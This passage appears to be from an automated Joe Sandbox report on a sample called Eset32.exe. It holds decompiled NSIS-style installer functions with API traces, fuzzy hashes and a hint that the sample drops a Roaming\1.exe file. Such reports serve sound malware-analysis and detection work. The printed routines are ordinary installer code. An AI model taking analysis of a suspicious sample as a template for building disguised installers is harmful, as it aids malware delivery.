                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: ItemTextlstrlenwsprintf
                                                          • String ID: %u.%u%s%s
                                                          • API String ID: 3540041739-3551169577
                                                          • Opcode ID: a1c755fdd4d8c4595d0eeac3b8ec17e8d877cccc6c1b0446fe9a747102dae0da
                                                          • Instruction ID: 22449cd78037b5055574fdfa12b268b27ceb02c465c900d7a820e94443fbddbc
                                                          • Opcode Fuzzy Hash: a1c755fdd4d8c4595d0eeac3b8ec17e8d877cccc6c1b0446fe9a747102dae0da
                                                          • Instruction Fuzzy Hash: 1911E773A041243BDB00A56D9C41EAF3298DF81374F260237FA26F71D1E979CC1246A9
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405A8F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00405A8F(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x40a014);
				}
				return _t7;
			}




                                                          0x00405a90
                                                          0x00405aa7
                                                          0x00405aaf
                                                          0x00405aaf
                                                          0x00405ab7

                                                          APIs
                                                          • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A95
                                                          • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403335,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405A9E
                                                          • lstrcatA.KERNEL32(?,0040A014,?,00000007,00000009,0000000B), ref: 00405AAF
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405A8F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrcatlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 2659869361-823278215
                                                          • Opcode ID: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                          • Instruction ID: 6078a555604e81c1816c45b3e60b5c3e7c31ed84b02af53c952a19e53ba35867
                                                          • Opcode Fuzzy Hash: 7e3bd0a74015a4b4c7bd8f32b9337ec82444728bd267b6e5413a6877d2367a50
                                                          • Instruction Fuzzy Hash: 68D0A7B26055307AE21126155C06ECB19488F463447060066F500BB193C77C4C114BFD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 0040209D Relevance: 6.1, APIs: 4, Instructions: 73libraryloaderCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 59%
                                                          			E0040209D(void* __ebx, void* __eflags) {
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x42f4f8");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42f4c8 =  *0x42f4c8 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402BCE(0xfffffff0);
				 *(_t34 + 8) = E00402BCE(1);
				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
					L3:
					_t30 = LoadLibraryExA(_t32, _t27, 8);
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E0040521E(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x430000, 0x40b878, 0x40a000);
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004038AA(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t30 = GetModuleHandleA(_t32);
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}








                                                          0x0040209d
                                                          0x0040209d
                                                          0x004020a2
                                                          0x004020a9
                                                          0x00402164
                                                          0x004022dd
                                                          0x004022dd
                                                          0x00402a5a
                                                          0x00402a5d
                                                          0x00402a69
                                                          0x00402a69
                                                          0x004020b8
                                                          0x004020c2
                                                          0x004020c5
                                                          0x004020d4
                                                          0x004020de
                                                          0x004020e2
                                                          0x0040215d
                                                          0x00000000
                                                          0x0040215d
                                                          0x004020e4
                                                          0x004020ed
                                                          0x004020f1
                                                          0x00402135
                                                          0x004020f3
                                                          0x004020f6
                                                          0x004020f9
                                                          0x00402129
                                                          0x004020fb
                                                          0x004020fe
                                                          0x00402107
                                                          0x00402109
                                                          0x00402109
                                                          0x00402107
                                                          0x004020f9
                                                          0x0040213d
                                                          0x00402152
                                                          0x00402152
                                                          0x00000000
                                                          0x0040213d
                                                          0x004020ce
                                                          0x004020d2
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(00000000,00000001,000000F0), ref: 004020C8
                                                            • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00428145,76DDEA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                            • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00428145,76DDEA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                            • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00428145,76DDEA30), ref: 0040527A
                                                            • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                            • Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052B2
                                                            • Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052CC
                                                            • Part of subcall function 0040521E: SendMessageA.USER32 ref: 004052DA
                                                          • LoadLibraryExA.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 004020D8
                                                          • GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
                                                          • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 2987980305-0
                                                          • Opcode ID: cbbca793592133c54db2e53d3555cb6bc9ab1f80129fbdab1f6ba1bcbb37dc43
                                                          • Instruction ID: f7200b9d034bcb950a45a2beb12b39e5fe5f048be62c56950c98b25cd9e943c1
                                                          • Opcode Fuzzy Hash: cbbca793592133c54db2e53d3555cb6bc9ab1f80129fbdab1f6ba1bcbb37dc43
                                                          • Instruction Fuzzy Hash: 7A21C932600115EBCF207FA58F49A5F76B1AF14359F20423BF651B61D1CABC89829A5E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00402E3D Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00402E3D(intOrPtr _a4) {
				long _t2;
				struct HWND__* _t3;
				struct HWND__* _t6;

				if(_a4 == 0) {
					__eflags =  *0x429448; // 0x0
					if(__eflags == 0) {
						_t2 = GetTickCount();
						__eflags = _t2 -  *0x42f430;
						if(_t2 >  *0x42f430) {
							_t3 = CreateDialogParamA( *0x42f420, 0x6f, 0, E00402DBA, 0);
							 *0x429448 = _t3;
							return ShowWindow(_t3, 5);
						}
						return _t2;
					} else {
						return E0040653C(0);
					}
				} else {
					_t6 =  *0x429448; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x429448 = 0;
					return _t6;
				}
			}






                                                          0x00402e44
                                                          0x00402e5e
                                                          0x00402e64
                                                          0x00402e6e
                                                          0x00402e74
                                                          0x00402e7a
                                                          0x00402e8b
                                                          0x00402e94
                                                          0x00000000
                                                          0x00402e99
                                                          0x00402ea0
                                                          0x00402e66
                                                          0x00402e6d
                                                          0x00402e6d
                                                          0x00402e46
                                                          0x00402e46
                                                          0x00402e4d
                                                          0x00402e50
                                                          0x00402e50
                                                          0x00402e56
                                                          0x00402e5d
                                                          0x00402e5d

                                                          APIs
                                                          • DestroyWindow.USER32(00000000,00000000,0040301B,00000001), ref: 00402E50
                                                          • GetTickCount.KERNEL32 ref: 00402E6E
                                                          • CreateDialogParamA.USER32(0000006F,00000000,00402DBA,00000000), ref: 00402E8B
                                                          • ShowWindow.USER32(00000000,00000005), ref: 00402E99
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                          • String ID:
                                                          • API String ID: 2102729457-0
                                                          • Opcode ID: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                                                          • Instruction ID: cc5f9dcce599e9be0c1e5b41ef6f72156ec830c1ee92694e4cf82ced2ffe4824
                                                          • Opcode Fuzzy Hash: 8c1e1bd8efa9ab411d4161537fee885c8283498bc89c51da2617a800704498c9
                                                          • Instruction Fuzzy Hash: B6F05E30A45630EBC6317B64FE4CA8B7B64BB44B45B91047AF045B22E8C6740C83CBED
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405B7D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 53%
                                                          			E00405B7D(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E004060F7(0x42bc98, _a4);
				_t21 = E00405B28(0x42bc98);
				if(_t21 != 0) {
					E004063D2(_t21);
					if(( *0x42f43c & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x42bc98;
						while(1) {
							_t11 = lstrlenA(0x42bc98);
							_push(0x42bc98);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E0040646B();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405AD6(0x42bc98);
								continue;
							} else {
								goto L1;
							}
						}
						E00405A8F();
						return 0 | GetFileAttributesA(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}








                                                          0x00405b89
                                                          0x00405b94
                                                          0x00405b98
                                                          0x00405b9f
                                                          0x00405bab
                                                          0x00405bb7
                                                          0x00405bb7
                                                          0x00405bcf
                                                          0x00405bd0
                                                          0x00405bd7
                                                          0x00405bd8
                                                          0x00000000
                                                          0x00000000
                                                          0x00405bbb
                                                          0x00405bc2
                                                          0x00405bca
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405bc2
                                                          0x00405bda
                                                          0x00000000
                                                          0x00405bee
                                                          0x00405bad
                                                          0x00405bb1
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405bb1
                                                          0x00405b9a
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,Name Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                                                            • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,76DDFA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,76DDFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                                                            • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                                                            • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                                                          • lstrlenA.KERNEL32(0042BC98,00000000,0042BC98,0042BC98,76DDFA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,76DDFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405BD0
                                                          • GetFileAttributesA.KERNEL32(0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,0042BC98,00000000,0042BC98,0042BC98,76DDFA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,76DDFA90,C:\Users\user\AppData\Local\Temp\), ref: 00405BE0
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B7D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 3248276644-823278215
                                                          • Opcode ID: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                                                          • Instruction ID: a7953992a1868a2a025aeaadbe30fe94b9837340da5d1ec43b16535858986a89
                                                          • Opcode Fuzzy Hash: e638d3577084fc0f37fd401aa5ef1a5930802456fef8e272e5ea6ea3ca1dc2da
                                                          • Instruction Fuzzy Hash: 6DF02821105E6116D222323A1C05AAF3A74CE82364715013FF862B22D3CF7CB9139DBE
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405192 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 89%
                                                          			E00405192(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x42a87c != _t16) {
							_push(_t16);
							_push(6);
							 *0x42a87c = _t16;
							E00404B4E();
						}
						L11:
						return CallWindowProcA( *0x42a884, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404ACE(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E004041C7(0x413);
				return 0;
			}





                                                          0x00405196
                                                          0x004051a0
                                                          0x004051bc
                                                          0x004051de
                                                          0x004051e1
                                                          0x004051e7
                                                          0x004051f1
                                                          0x004051f2
                                                          0x004051f4
                                                          0x004051fa
                                                          0x004051fa
                                                          0x00405204
                                                          0x00000000
                                                          0x00405212
                                                          0x004051c9
                                                          0x00405201
                                                          0x00405201
                                                          0x00000000
                                                          0x00405201
                                                          0x004051d5
                                                          0x004051d7
                                                          0x00000000
                                                          0x004051d7
                                                          0x004051a6
                                                          0x00000000
                                                          0x00000000
                                                          0x004051ad
                                                          0x00000000

                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 004051C1
                                                          • CallWindowProcA.USER32 ref: 00405212
                                                            • Part of subcall function 004041C7: SendMessageA.USER32 ref: 004041D9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: Window$CallMessageProcSendVisible
                                                          • String ID:
                                                          • API String ID: 3748168415-3916222277
                                                          • Opcode ID: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                                                          • Instruction ID: 7056b910bbb205cd539ea3acc8ab51e06e0639846daa80cdaddfd33d10a348e5
                                                          • Opcode Fuzzy Hash: 9af3a59599e8879c459ffb9579ce68eec3d4baecce8abe749bc9c6a9b619fe8d
                                                          • Instruction Fuzzy Hash: 47017171200609ABEF20AF11DD80A5B3666EB84354F14413AFB107A1D1C77A8C62DE6E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405FDE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 90%
                                                          			E00405FDE(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x400;
				_t21 = E00405F7D(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExA(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x3ff] = _t30[0x3ff] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}







                                                          0x00405fec
                                                          0x00405fee
                                                          0x00406006
                                                          0x0040600b
                                                          0x00406010
                                                          0x0040604d
                                                          0x0040604d
                                                          0x00406012
                                                          0x00406024
                                                          0x0040602f
                                                          0x00406035
                                                          0x0040603f
                                                          0x00000000
                                                          0x00000000
                                                          0x0040603f
                                                          0x00406052

                                                          APIs
                                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,00000400,C:\Users\user\AppData\Roaming\1.exe,0042A070,?,?,?,00000002,C:\Users\user\AppData\Roaming\1.exe,?,00406293,80000002), ref: 00406024
                                                          • RegCloseKey.ADVAPI32(?,?,00406293,80000002,Software\Microsoft\Windows\CurrentVersion,C:\Users\user\AppData\Roaming\1.exe,C:\Users\user\AppData\Roaming\1.exe,C:\Users\user\AppData\Roaming\1.exe,?,0042A070), ref: 0040602F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: CloseQueryValue
                                                          • String ID: C:\Users\user\AppData\Roaming\1.exe
                                                          • API String ID: 3356406503-4019330430
                                                          • Opcode ID: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                          • Instruction ID: 43fb42cdfa68b2f9ef01d23c83e90927a4e1ed7766022ad00d18a88e1c3f91d6
                                                          • Opcode Fuzzy Hash: 2abccbe21afdcf7b2969046f12d50590a05fc3777738c5024e31ebbb51756706
                                                          • Instruction Fuzzy Hash: 9F01BC72100209ABCF22CF20CC09FDB3FA9EF45364F00403AF916A2191D238C968CBA4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00403875 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00403875() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x429854; // 0x0
				_t3 = E0040385A(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x429854 =  *0x429854 & 0x00000000;
				return _t3;
			}







                                                          0x00403876
                                                          0x0040387e
                                                          0x00403885
                                                          0x00403888
                                                          0x00403888
                                                          0x0040388a
                                                          0x0040388f
                                                          0x00403896
                                                          0x0040389c
                                                          0x004038a0
                                                          0x004038a1
                                                          0x004038a9

                                                          APIs
                                                          • FreeLibrary.KERNEL32(?,76DDFA90,00000000,C:\Users\user\AppData\Local\Temp\,0040384D,00403667,?,?,00000007,00000009,0000000B), ref: 0040388F
                                                          • GlobalFree.KERNEL32 ref: 00403896
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00403875
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: Free$GlobalLibrary
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 1100898210-823278215
                                                          • Opcode ID: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                          • Instruction ID: eaa0fdc8f68cdeff62b7926931e70464fa678e679eb7ff43971a821d65c68845
                                                          • Opcode Fuzzy Hash: 7191d99a6f9acf46369f1b571abb68d71f554d24c115b495d4645827db6beddd
                                                          • Instruction Fuzzy Hash: 20E08C335110205BC7613F54EA0471A77ECAF59B62F4A017EF8847B26087781C464A88
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 00405AD6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E00405AD6(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                                          0x00405ad7
                                                          0x00405ae1
                                                          0x00405ae3
                                                          0x00405aea
                                                          0x00405af2
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00405af2
                                                          0x00405af4
                                                          0x00405af9

                                                          APIs
                                                          • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Eset32.exe,C:\Users\user\Desktop\Eset32.exe,80000000,00000003), ref: 00405ADC
                                                          • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402F0D,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Eset32.exe,C:\Users\user\Desktop\Eset32.exe,80000000,00000003), ref: 00405AEA
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.429947309.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.429940533.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429957755.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430001955.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430014747.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.430021999.0000000000438000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_Eset32.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrlen
                                                          • String ID: C:\Users\user\Desktop
                                                          • API String ID: 2709904686-1246513382
                                                          • Opcode ID: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                          • Instruction ID: fbea36dfa466fa1ea2516b65251d52c814037185d06ce8b70eff5ee1363e4df1
                                                          • Opcode Fuzzy Hash: 7cfe4fb9fb084f73e38b743788eacbc948a8cb50b3ca3a16f7beb83d38b7a1d7
                                                          • Instruction Fuzzy Hash: 73D0A7B25089706EFB0352509C00B8F6E88CF17300F0A04A3E080A7191C7B84C424BFD
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

